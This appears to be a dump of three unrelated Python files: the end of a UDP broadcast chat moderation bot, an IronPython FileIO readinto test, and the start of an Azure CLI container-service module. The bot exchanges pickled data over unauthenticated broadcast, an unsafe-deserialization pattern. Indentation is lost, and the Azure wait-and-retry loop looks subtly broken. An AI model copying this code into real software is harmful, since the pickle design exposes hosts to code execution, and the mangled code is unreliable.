self.broadcast(pickle.dumps(messageAndHash))
elif 'compute' in deserialized_data['message'].split(' ') and 'response' in deserialized_data['message'].split(' ') and 4 in self.options:
r = ping(address[0])
hashed = SHA1.new()
msg = f'Avg RTT for you is {r.rtt_avg/2} seconds'
msg = f'>{self.user} ' + msg
hashed.update(msg.encode('utf-8'))
messageAndHash = {'hash': hashed.hexdigest(), 'message': msg}
self.broadcast(pickle.dumps(messageAndHash))
break
if 5 in self.options:
for j in range(len(self.messageTracker)):
if address in self.messageTracker[j]:
if (time.perf_counter() - self.messageTracker[j][1]) > 300:
hashed = SHA1.new()
msg = "You have been gone over 5 minutes, consider disconnecting"
msg = f'>{self.user} ' + msg
hashed.update(msg.encode('utf-8'))
messageAndHash = {'hash': hashed.hexdigest(), 'message': msg}
self.broadcast(pickle.dumps(messageAndHash))
break
else:
self.messageTracker[j][1] = time.perf_counter()
break
# default case: address not yet tracked (it should normally be added when the user first connects)
self.messageTracker.append([address, time.perf_counter()])
def listen(self):
self.receive()
def broadcast(self, msg, toItself=False):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) # set socket to broadcast with flag
sock.sendto(msg, ('<broadcast>', self.port))
if toItself:
self.listen()
def run(self):
print(f'\n#{self.user} has joined the chat\n')
thread = Thread(target=self.listen)
thread.start()
def setPort(self, port):
self.port = port
self.udpSocket.bind((self.addr, int(self.port)))
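if __name__ == '__main__':
    # Minimal, illustrative example of running the bot. The port, bot name and the
    # chosen option codes below are arbitrary example values, not required by the class:
    #   1 = welcome new users, 2 = bad-word filter, 3 = warn/ban, 4 = RTT reply, 5 = idle reminder
    bot = Bot(12345, options=[1, 2, 3], botName='modbot')
    bot.setPort(12345)   # binding only happens in setPort, so bind before listening
    bot.run()            # starts the background listener thread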
|
test__fileio.py
|
# Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the Apache 2.0 License.
# See the LICENSE file in the project root for more information.
'''
Tests for CPython's _fileio module.
'''
import os
import sys
import time
import threading
import unittest
from _io import FileIO
from iptest import run_test
TEMP_READINTO_NAME = "_fileio__FileIO_readinto%d.tmp"
def bytesio_helper():
return (bytes(bytearray(b'')),
bytes(bytearray(b'a')),
bytes(bytearray(b'ab')),
bytes(bytearray(b'abc')),
bytes(bytearray(b'abcd')),
bytes(bytearray(b'abcde')),
bytes(bytearray(b'abcdef')),
bytes(bytearray(b'abcdefg')),
bytes(bytearray(b'abcdefgh')),
bytes(bytearray(b'abcdefghi'))
)
def fileio_helper():
bytes_io_list = bytesio_helper()
file_io_list = []
for i in range(len(bytes_io_list)):
with FileIO(TEMP_READINTO_NAME % i, "w") as f:
f.write(bytes_io_list[i])
file_io_list.append(FileIO(TEMP_READINTO_NAME % i, "r"))
return file_io_list
class FileIOTest(unittest.TestCase):
def test__FileIO___class__(self):
'''
TODO
'''
pass
def test__FileIO___delattr__(self):
'''
TODO
'''
pass
def test__FileIO___doc__(self):
'''
TODO
'''
pass
def test__FileIO___format__(self):
'''
TODO
'''
pass
def test__FileIO___getattribute__(self):
'''
TODO
'''
pass
def test__FileIO___hash__(self):
'''
TODO
'''
pass
def test__FileIO___init__(self):
'''
TODO
'''
pass
def test__FileIO___new__(self):
'''
TODO
'''
pass
def test__FileIO___reduce__(self):
'''
TODO
'''
pass
def test__FileIO___reduce_ex__(self):
'''
TODO
'''
pass
def test__FileIO___repr__(self):
'''
TODO
'''
pass
def test__FileIO___setattr__(self):
'''
TODO
'''
pass
def test__FileIO___sizeof__(self):
'''
TODO
'''
pass
def test__FileIO___str__(self):
'''
TODO
'''
pass
def test__FileIO___subclasshook__(self):
'''
TODO
'''
pass
def test__FileIO_close(self):
'''
TODO
'''
pass
def test__FileIO_closed(self):
'''
TODO
'''
pass
def test__FileIO_closefd(self):
'''
TODO
'''
pass
def test__FileIO_fileno(self):
'''
TODO
'''
pass
def test__FileIO_isatty(self):
'''
TODO
'''
pass
def test__FileIO_mode(self):
'''
TODO
'''
pass
def test__FileIO_read(self):
'''
TODO
'''
pass
def test__FileIO_readable(self):
'''
TODO
'''
pass
def test__FileIO_readall(self):
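# readall() on the read end of a pipe should block until the writer closes:
# the main thread writes b'abc\n', the helper thread writes b'abc' and closes,
# so readall() is expected to return everything, i.e. b'abc\nabc'.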
r, w = os.pipe()
wf = FileIO(w, 'w')
def writefile():
time.sleep(0.05)
wf.write(bytes(bytearray(b'abc')))
wf.close()
wf.write(bytes(bytearray(b'abc\n')))
t = threading.Thread(target=writefile)
t.start()
with FileIO(r, 'r') as rf:
self.assertEqual(rf.readall(), b'abc\nabc')
t.join()
def test__FileIO_readinto(self):
'''
TODO
'''
pass
def test__FileIO_seek(self):
'''
TODO
'''
pass
def test__FileIO_seekable(self):
'''
TODO
'''
pass
def test__FileIO_tell(self):
'''
TODO
'''
pass
def test__FileIO_truncate(self):
'''
TODO
'''
pass
def test__FileIO_writable(self):
'''
TODO
'''
pass
def test__FileIO_write(self):
'''
TODO
'''
pass
def test_coverage(self):
'''
Test holes as found by code coverage runs. These need to be refactored and
moved to other functions throughout this module (TODO).
'''
#--FileIO.readinto(array.array(...))
import array
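# Each case below is a triple:
#   [array.array constructor args,
#    expected array contents after readinto() for each of the ten helper files (contents of length 0..9),
#    expected readinto() return values (bytes read) for each of those files]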
readinto_cases = [
[('b',),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
[('b',[0]),
[[0],[97],[97],[97],[97],[97],[97],[97],[97],[97]],
[0,1,1,1,1,1,1,1,1,1]],
[('b',[0,-1]),
[[0,-1],[97,-1],[97,98],[97,98],[97,98],[97,98],[97,98],[97,98],[97,98],[97,98]],
[0,1,2,2,2,2,2,2,2,2]],
[('b',[0,1,2]),
[[0,1,2],[97,1,2],[97,98,2],[97,98,99],[97,98,99],[97,98,99],[97,98,99],[97,98,99],[97,98,99],[97,98,99]],
[0,1,2,3,3,3,3,3,3,3]],
[('b',[0,1,2,3,4,5,6]),
[[0,1,2,3,4,5,6],[97,1,2,3,4,5,6],[97,98,2,3,4,5,6],[97,98,99,3,4,5,6],[97,98,99,100,4,5,6],[97,98,99,100,101,5,6],[97,98,99,100,101,102,6],[97,98,99,100,101,102,103],[97,98,99,100,101,102,103],[97,98,99,100,101,102,103]],
[0,1,2,3,4,5,6,7,7,7]],
[('b',[0,1,2,3,4,5,6,7]),
[[0,1,2,3,4,5,6,7],[97,1,2,3,4,5,6,7],[97,98,2,3,4,5,6,7],[97,98,99,3,4,5,6,7],[97,98,99,100,4,5,6,7],[97,98,99,100,101,5,6,7],[97,98,99,100,101,102,6,7],[97,98,99,100,101,102,103,7],[97,98,99,100,101,102,103,104],[97,98,99,100,101,102,103,104]],
[0,1,2,3,4,5,6,7,8,8]],
[('b',[0,1,2,3,4,5,6,7,8]),
[[0,1,2,3,4,5,6,7,8],[97,1,2,3,4,5,6,7,8],[97,98,2,3,4,5,6,7,8],[97,98,99,3,4,5,6,7,8],[97,98,99,100,4,5,6,7,8],[97,98,99,100,101,5,6,7,8],[97,98,99,100,101,102,6,7,8],[97,98,99,100,101,102,103,7,8],[97,98,99,100,101,102,103,104,8],[97,98,99,100,101,102,103,104,105]],
[0,1,2,3,4,5,6,7,8,9]],
[('b',[0,1,2,3,4,5,6,7,8,9]),
[[0,1,2,3,4,5,6,7,8,9],[97,1,2,3,4,5,6,7,8,9],[97,98,2,3,4,5,6,7,8,9],[97,98,99,3,4,5,6,7,8,9],[97,98,99,100,4,5,6,7,8,9],[97,98,99,100,101,5,6,7,8,9],[97,98,99,100,101,102,6,7,8,9],[97,98,99,100,101,102,103,7,8,9],[97,98,99,100,101,102,103,104,8,9],[97,98,99,100,101,102,103,104,105,9]],
[0,1,2,3,4,5,6,7,8,9]],
[('B',),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
[('B',[0,1]),
[[0,1],[97,1],[97,98],[97,98],[97,98],[97,98],[97,98],[97,98],[97,98],[97,98]],
[0,1,2,2,2,2,2,2,2,2]],
[('u',),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
[('u',''),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
[('h',),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
[('h',[1,2]),
[[1,2],[97,2],[25185,2],[25185,99],[25185,25699],[25185,25699],[25185,25699],[25185,25699],[25185,25699],[25185,25699]],
[0,1,2,3,4,4,4,4,4,4]],
[('H',),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
[('H',[]),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
[('H',[49]),
[[49],[97],[25185],[25185],[25185],[25185],[25185],[25185],[25185],[25185]],
[0,1,2,2,2,2,2,2,2,2]],
[('H',[2,3]),
[[2,3],[97,3],[25185,3],[25185,99],[25185,25699],[25185,25699],[25185,25699],[25185,25699],[25185,25699],[25185,25699]],
[0,1,2,3,4,4,4,4,4,4]],
[('i',),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
[('I',),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
[('l',),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
[('L',),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
[('f',[]),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
[('d',),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
#http://ironpython.codeplex.com/WorkItem/View.aspx?WorkItemId=24303
[('u','z'),
[['z'],['a'],['\u6261'],['\u6261'],['\u6261'],['\u6261'],['\u6261'],['\u6261'],['\u6261'],['\u6261']],
[0,1,2,2,2,2,2,2,2,2]],
[('u','az'),
[['a','z'],['a','z'],['\u6261','z'],['\u6261','c'],['\u6261','\u6463'],['\u6261','\u6463'],['\u6261','\u6463'],['\u6261','\u6463'],['\u6261','\u6463'],['\u6261','\u6463']],
[0,1,2,3,4,4,4,4,4,4]],
[('u','*'),
[['*'],['a'],['\u6261'],['\u6261'],['\u6261'],['\u6261'],['\u6261'],['\u6261'],['\u6261'],['\u6261']],
[0,1,2,2,2,2,2,2,2,2]],
#http://ironpython.codeplex.com/WorkItem/View.aspx?WorkItemId=24316
[('h',[-1]),
[[-1],[-159],[25185],[25185],[25185],[25185],[25185],[25185],[25185],[25185]],
[0,1,2,2,2,2,2,2,2,2]],
#http://ironpython.codeplex.com/WorkItem/View.aspx?WorkItemId=24316
[('h',[1,-99,47]),
[[1,-99,47],[97,-99,47],[25185,-99,47],[25185,-157,47],[25185,25699,47],[25185,25699,101],[25185,25699,26213],[25185,25699,26213],[25185,25699,26213],[25185,25699,26213]],
[0,1,2,3,4,5,6,6,6,6]],
#http://ironpython.codeplex.com/WorkItem/View.aspx?WorkItemId=24317
[('i',[1,2]),
[[1,2],[97,2],[25185,2],[6513249,2],[1684234849,2],[1684234849,101],[1684234849,26213],[1684234849,6776421],[1684234849,1751606885],[1684234849,1751606885]],
[0,1,2,3,4,5,6,7,8,8]],
#http://ironpython.codeplex.com/WorkItem/View.aspx?WorkItemId=24316
[('i',[-1]),
[[-1],[-159],[-40351],[-10263967],[1684234849],[1684234849],[1684234849],[1684234849],[1684234849],[1684234849]],
[0,1,2,3,4,4,4,4,4,4]],
#http://ironpython.codeplex.com/WorkItem/View.aspx?WorkItemId=24316
[('i',[1,-99,47]),
[[1,-99,47],[97,-99,47],[25185,-99,47],[6513249,-99,47],[1684234849,-99,47],[1684234849,-155,47],[1684234849,-39323,47],[1684234849,-10000795,47],[1684234849,1751606885,47],[1684234849,1751606885,105]],
[0,1,2,3,4,5,6,7,8,9]],
#http://ironpython.codeplex.com/WorkItem/View.aspx?WorkItemId=24317
[('I',[1]),
[[1],[97],[25185],[6513249],[1684234849],[1684234849],[1684234849],[1684234849],[1684234849],[1684234849]],
[0,1,2,3,4,4,4,4,4,4]],
[('I',[1,999,47]),
[[1,999,47],[97,999,47],[25185,999,47],[6513249,999,47],[1684234849,999,47],[1684234849,869,47],[1684234849,26213,47],[1684234849,6776421,47],[1684234849,1751606885,47],[1684234849,1751606885,105]],
[0,1,2,3,4,5,6,7,8,9]],
#http://ironpython.codeplex.com/WorkItem/View.aspx?WorkItemId=24317
[('l',[1,2]),
[[1,2],[97,2],[25185,2],[6513249,2],[1684234849,2],[1684234849,101],[1684234849,26213],[1684234849,6776421],[1684234849,1751606885],[1684234849,1751606885]],
[0,1,2,3,4,5,6,7,8,8]],
[('l',[-1]),
[[-1],[-159],[-40351],[-10263967],[1684234849],[1684234849],[1684234849],[1684234849],[1684234849],[1684234849]],
[0,1,2,3,4,4,4,4,4,4]],
[('l',[1,-99,47]),
[[1,-99,47],[97,-99,47],[25185,-99,47],[6513249,-99,47],[1684234849,-99,47],[1684234849,-155,47],[1684234849,-39323,47],[1684234849,-10000795,47],[1684234849,1751606885,47],[1684234849,1751606885,105]],
[0,1,2,3,4,5,6,7,8,9]],
[('l',[1,-99,47,48]),
[[1,-99,47,48],[97,-99,47,48],[25185,-99,47,48],[6513249,-99,47,48],[1684234849,-99,47,48],[1684234849,-155,47,48],[1684234849,-39323,47,48],[1684234849,-10000795,47,48],[1684234849,1751606885,47,48],[1684234849,1751606885,105,48]],
[0,1,2,3,4,5,6,7,8,9]],
[('l',[1,-99,47,48,49]),
[[1,-99,47,48,49],[97,-99,47,48,49],[25185,-99,47,48,49],[6513249,-99,47,48,49],[1684234849,-99,47,48,49],[1684234849,-155,47,48,49],[1684234849,-39323,47,48,49],[1684234849,-10000795,47,48,49],[1684234849,1751606885,47,48,49],[1684234849,1751606885,105,48,49]],
[0,1,2,3,4,5,6,7,8,9]],
#http://ironpython.codeplex.com/WorkItem/View.aspx?WorkItemId=24318
[('L',[100000000]),
[[100000000],[100000097],[99967585],[90399329],[1684234849],[1684234849],[1684234849],[1684234849],[1684234849],[1684234849]],
[0,1,2,3,4,4,4,4,4,4]],
[('L',[1,99,47]),
[[1,99,47],[97,99,47],[25185,99,47],[6513249,99,47],[1684234849,99,47],[1684234849,101,47],[1684234849,26213,47],[1684234849,6776421,47],[1684234849,1751606885,47],[1684234849,1751606885,105]],
[0,1,2,3,4,5,6,7,8,9]],
#http://ironpython.codeplex.com/WorkItem/View.aspx?WorkItemId=24319
[('f',[3.1415926535897931]),
[[3.1415927410125732],[3.1415636539459229],[3.1466295719146729],[3.5528795719146729],[1.6777999408082104e+22],[1.6777999408082104e+22],[1.6777999408082104e+22],[1.6777999408082104e+22],[1.6777999408082104e+22],[1.6777999408082104e+22]],
[0,1,2,3,4,4,4,4,4,4]],
[('f',[1.0,3.1400000000000001,0.997]),
[[1.0,3.1400001049041748,0.99699997901916504],[1.0000115633010864,3.1400001049041748,0.99699997901916504],[1.0030022859573364,3.1400001049041748,0.99699997901916504],[0.88821989297866821,3.1400001049041748,0.99699997901916504],[1.6777999408082104e+22,3.1400001049041748,0.99699997901916504],[1.6777999408082104e+22,3.1399776935577393,0.99699997901916504],[1.6777999408082104e+22,3.1312496662139893,0.99699997901916504],[1.6777999408082104e+22,3.6156246662139893,0.99699997901916504],[1.6777999408082104e+22,4.371022013021617e+24,0.99699997901916504],[1.6777999408082104e+22,4.371022013021617e+24,0.99700027704238892]],
[0,1,2,3,4,5,6,7,8,9]],
#http://ironpython.codeplex.com/WorkItem/View.aspx?WorkItemId=24319
[('d',[3.1415926535897931]),
[[3.1415926535897931],[3.1415926535898255],[3.1415926535958509],[3.1415926544980697],[3.1415927737073592],[3.1413066714124374],[3.1749980776624374],[187.19987697039599],[8.5408832230361244e+194],[8.5408832230361244e+194]],
[0,1,2,3,4,5,6,7,8,8]],
[('d',[1.0,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004]),
[[1.0,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004],[1.0000000000000215,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004],[1.0000000000055922,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004],[1.0000000014462318,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004],[1.0000003739752616,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004],[1.0000966950812187,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004],[1.0249990388312187,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004],[0.002856443435217224,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004],[8.5408832230361244e+194,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004],[8.5408832230361244e+194,3.140000000000033,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004]],
[0,1,2,3,4,5,6,7,8,9]],
[('d',[1.0,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5]),
[[1.0,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5],[1.0000000000000215,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5],[1.0000000000055922,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5],[1.0000000014462318,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5],[1.0000003739752616,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5],[1.0000966950812187,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5],[1.0249990388312187,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5],[0.002856443435217224,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5],[8.5408832230361244e+194,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5],[8.5408832230361244e+194,3.140000000000033,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5]],
[0,1,2,3,4,5,6,7,8,9]],
[('d',[1.0,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5,6.5999999999999996]),
[[1.0,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5,6.5999999999999996],[1.0000000000000215,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5,6.5999999999999996],[1.0000000000055922,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5,6.5999999999999996],[1.0000000014462318,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5,6.5999999999999996],[1.0000003739752616,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5,6.5999999999999996],[1.0000966950812187,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5,6.5999999999999996],[1.0249990388312187,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5,6.5999999999999996],[0.002856443435217224,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5,6.5999999999999996],[8.5408832230361244e+194,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5,6.5999999999999996],[8.5408832230361244e+194,3.140000000000033,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5,6.5999999999999996]],
[0,1,2,3,4,5,6,7,8,9]],
]
#Cases working correctly under IronPython
for a_params, a_expected, f_expected in readinto_cases:
f_list = fileio_helper()
for i in range(len(f_list)):
a = array.array(*a_params)
ba = bytearray(a.tobytes())
f = f_list[i]
self.assertEqual(f.readinto(a),
f_expected[i])
self.assertEqual(a.tolist(),
a_expected[i])
# try with bytearray as well - https://github.com/IronLanguages/ironpython2/issues/713
f.seek(0)
self.assertEqual(f.readinto(ba), f_expected[i])
self.assertEqual(ba, a.tobytes())
#cleanup
for f in f_list:
f.close()
for i in range(len(f_list)):
try:
os.remove(TEMP_READINTO_NAME % i)
except:
pass
run_test(__name__)
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import random
import re
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
# pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from msrestazure.azure_exceptions import CloudError
import requests
# pylint: disable=no-name-in-module,import-error
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.core.api import get_config_dir
from azure.cli.core._profile import Profile
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
ApplicationUpdateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters,
ResourceAccess, RequiredResourceAccess)
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceNetworkProfile
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceLinuxProfile
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterServicePrincipalProfile
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceSshConfiguration
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceSshPublicKey
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceStorageProfileTypes
from azure.mgmt.containerservice.v2020_03_01.models import ManagedCluster
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterAADProfile
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterAddonProfile
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterAgentPoolProfile
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterIdentity
from azure.mgmt.containerservice.v2020_03_01.models import AgentPool
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterSKU
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterWindowsProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedClusterAgentPoolProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedClusterMasterPoolProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftAgentPoolProfileRole
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedClusterIdentityProvider
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedClusterAADIdentityProvider
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedCluster
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftRouterProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedClusterAuthProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import NetworkProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedClusterMonitorProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftAPIProperties
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._helpers import _populate_api_server_access_profile, _set_vm_set_type, _set_outbound_type
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
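# Example (illustrative): which('kubectl') returns the full path of the kubectl binary
# if it is found on PATH (the '.exe' suffix is appended automatically on Windows),
# otherwise None.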
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=(url,))
t.daemon = True
t.start()
def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
"""
Opens a browser to the web interface for the cluster orchestrator
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
:param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
if str(orchestrator_type).lower() == 'kubernetes' or \
orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
(acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member
return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
if str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
raise CLIError('Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Launch a proxy and browse the Kubernetes web UI.
:param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
if os.path.exists(browse_path):
os.remove(browse_path)
_k8s_get_credentials_internal(name, acs_info, browse_path, ssh_key_file, False)
logger.warning('Proxy running on 127.0.0.1:8001/ui')
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1:8001/ui')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
:param name: name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
:param ssh_key_file: Path to the SSH key to use
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
if not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
acs = acs_client.ACSClient()
if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
key_filename=ssh_key_file):
raise CLIError('Error connecting to ACS: {}'.format(_get_host_name(acs_info)))
octarine_bin = '/opt/mesosphere/bin/octarine'
if not acs.file_exists(octarine_bin):
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
proxy_id = _rand_str(16)
proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
acs.run(proxy_cmd, background=True)
# Parse the output to get the remote PORT
proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
stdout, _ = acs.run(proxy_client_cmd)
